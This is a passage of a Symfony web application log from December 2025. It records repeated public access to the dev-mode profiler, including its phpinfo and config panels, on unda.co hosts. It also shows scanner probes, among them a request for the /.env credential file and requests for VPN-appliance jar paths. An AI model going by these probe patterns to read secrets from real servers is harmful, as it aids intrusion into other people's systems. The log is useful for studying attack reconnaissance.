  7222. [2025-12-20 12:42:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  7223. [2025-12-20 12:43:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1d9ab8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1d9ab8?panel=dump","method":"GET"} []
  7224. [2025-12-20 12:43:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  7225. [2025-12-20 12:48:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"63017c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/63017c?panel=form","method":"GET"} []
  7226. [2025-12-20 12:48:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  7227. [2025-12-20 12:49:02] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"35eea5","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/35eea5/search/results?ip=189.172.83.228&limit=10&method=GET","method":"GET"} []
  7228. [2025-12-20 12:49:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.83.228&limit=10&method=GET","method":"GET"} []
  7229. [2025-12-20 12:50:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"223e5d","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/223e5d?panel=security","method":"GET"} []
  7230. [2025-12-20 12:50:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  7231. [2025-12-20 12:52:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7232. [2025-12-20 12:59:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"55fc44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/55fc44?panel=db","method":"GET"} []
  7233. [2025-12-20 12:59:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  7234. [2025-12-20 13:01:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"efb3fb","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/efb3fb?panel=twig","method":"GET"} []
  7235. [2025-12-20 13:01:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  7236. [2025-12-20 13:06:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=router","method":"GET"} []
  7237. [2025-12-20 13:06:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  7238. [2025-12-20 13:06:20] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"5ebd67","_route":"_profiler_router"},"request_uri":"https://unda.co/_profiler/5ebd67/router","method":"GET"} []
  7239. [2025-12-20 13:08:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7240. [2025-12-20 13:09:41] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  7241. [2025-12-20 13:10:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=validator","method":"GET"} []
  7242. [2025-12-20 13:10:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  7243. [2025-12-20 13:13:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"efb3fb","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/efb3fb?panel=time","method":"GET"} []
  7244. [2025-12-20 13:13:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  7245. [2025-12-20 13:14:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"260090","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/260090?panel=cache","method":"GET"} []
  7246. [2025-12-20 13:14:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  7247. [2025-12-20 13:19:21] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"5ebd67","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/5ebd67/search/results?ip=66.249.75.1&limit=10","method":"GET"} []
  7248. [2025-12-20 13:19:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.75.1&limit=10","method":"GET"} []
  7249. [2025-12-20 13:25:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e22341","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e22341","method":"GET"} []
  7250. [2025-12-20 13:25:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  7251. [2025-12-20 13:27:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9727b6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9727b6?panel=form","method":"GET"} []
  7252. [2025-12-20 13:27:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  7253. [2025-12-20 13:27:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7254. [2025-12-20 13:28:00] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  7255. [2025-12-20 13:28:21] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
  7256. [2025-12-20 13:32:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=db","method":"GET"} []
  7257. [2025-12-20 13:32:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  7258. [2025-12-20 13:36:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=logger","method":"GET"} []
  7259. [2025-12-20 13:36:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  7260. [2025-12-20 13:39:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"567cce","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/567cce?panel=twig","method":"GET"} []
  7261. [2025-12-20 13:39:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  7262. [2025-12-20 13:42:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"efb3fb","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/efb3fb?panel=security","method":"GET"} []
  7263. [2025-12-20 13:42:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  7264. [2025-12-20 13:55:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"efb3fb","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/efb3fb?panel=request","method":"GET"} []
  7265. [2025-12-20 13:55:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  7266. [2025-12-20 13:57:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"aa0429","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/aa0429?panel=cache","method":"GET"} []
  7267. [2025-12-20 13:57:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  7268. [2025-12-20 13:59:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=config","method":"GET"} []
  7269. [2025-12-20 13:59:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  7270. [2025-12-20 14:03:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c78c5b","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c78c5b?panel=config","method":"GET"} []
  7271. [2025-12-20 14:03:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  7272. [2025-12-20 14:06:04] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  7273. [2025-12-20 14:06:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7274. [2025-12-20 14:06:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=form","method":"GET"} []
  7275. [2025-12-20 14:06:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  7276. [2025-12-20 14:07:38] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"b8d5e3","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/b8d5e3/search/results?ip=216.106.187.123&limit=10","method":"GET"} []
  7277. [2025-12-20 14:07:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=216.106.187.123&limit=10","method":"GET"} []
  7278. [2025-12-20 14:08:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"efb3fb","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/efb3fb?panel=config","method":"GET"} []
  7279. [2025-12-20 14:08:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  7280. [2025-12-20 14:09:40] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  7281. [2025-12-20 14:12:00] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  7282. [2025-12-20 14:12:58] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  7283. [2025-12-20 14:13:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27c2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27c2a?panel=exception","method":"GET"} []
  7284. [2025-12-20 14:13:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  7285. [2025-12-20 14:18:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/Java.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/Java.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7286. [2025-12-20 14:18:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/a1.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/a1.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7287. [2025-12-20 14:19:40] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  7288. [2025-12-20 14:20:55] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  7289. [2025-12-20 14:20:55] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  7290. [2025-12-20 14:20:55] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7291. [2025-12-20 14:20:55] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7292. [2025-12-20 14:20:55] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  7293. [2025-12-20 14:20:55] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7294. [2025-12-20 14:20:55] security.DEBUG: Calling Authentication entry point. [] []
  7295. [2025-12-20 14:21:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"efb3fb","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/efb3fb?panel=cache","method":"GET"} []
  7296. [2025-12-20 14:21:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  7297. [2025-12-20 14:25:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"260090","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/260090?panel=swiftmailer","method":"GET"} []
  7298. [2025-12-20 14:25:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  7299. [2025-12-20 14:30:59] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  7300. [2025-12-20 14:31:02] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
  7301. [2025-12-20 14:34:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"efb3fb","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/efb3fb","method":"GET"} []
  7302. [2025-12-20 14:34:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  7303. [2025-12-20 14:35:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ab2g"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ab2g\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7304. [2025-12-20 14:35:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ab2h"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ab2h\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7305. [2025-12-20 14:35:07] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  7306. [2025-12-20 14:35:08] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  7307. [2025-12-20 14:35:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /teorema505"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /teorema505\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7308. [2025-12-20 14:35:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\AccessDeniedHttpException: "" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php line 90 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException(code: 0):  at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php:90)"} []
  7309. [2025-12-20 14:36:23] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
  7310. [2025-12-20 14:36:31] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"675298","_route":"_wdt"},"request_uri":"https://www.unda.co/_wdt/675298","method":"GET"} []
  7311. [2025-12-20 14:37:38] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  7312. [2025-12-20 14:38:29] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  7313. [2025-12-20 14:38:38] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"4fefff","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/4fefff","method":"GET"} []
  7314. [2025-12-20 14:43:15] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  7315. [2025-12-20 14:43:18] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
  7316. [2025-12-20 14:46:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7a1fc0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7a1fc0?panel=cache","method":"GET"} []
  7317. [2025-12-20 14:46:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  7318. [2025-12-20 14:59:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7a1fc0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7a1fc0?panel=request","method":"GET"} []
  7319. [2025-12-20 14:59:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
